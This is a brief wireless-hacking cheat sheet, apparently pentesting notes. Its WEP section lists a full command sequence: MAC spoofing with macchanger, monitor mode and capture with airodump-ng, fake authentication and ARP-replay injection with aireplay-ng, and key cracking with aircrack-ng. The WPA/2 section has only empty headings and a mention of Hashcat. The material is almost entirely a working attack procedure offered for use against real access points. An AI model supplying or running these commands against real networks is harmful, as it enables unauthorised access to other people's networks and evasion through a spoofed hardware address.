Hacking Wireless

WEP

Configure Interface:

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac aa:bb:cc:dd:ee:ff wlan0
airmon-ng start wlan0

Scan for networks:

airodump-ng mon0

Target AP:

airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0

Attack:

aireplay-ng -1 0 -a (bssid) -h aa:bb:cc:dd:ee:ff -e (essid) wlan0
aireplay-ng -3 -b (bssid) -h aa:bb:cc:dd:ee:ff wlan0
(captured data will have to be above 10,000 to crack)

Cracking:

aircrack-ng -b (bssid) (file_name-01.cap)

WPA/2

Configure Interface:

Scan for networks:

Choose your target and then:

Attack using AP MAC and Client MAC:

Crack the handshake

It is also possible to crack the hash using Hashcat (better method). You will need to convert the handshake first

Last updated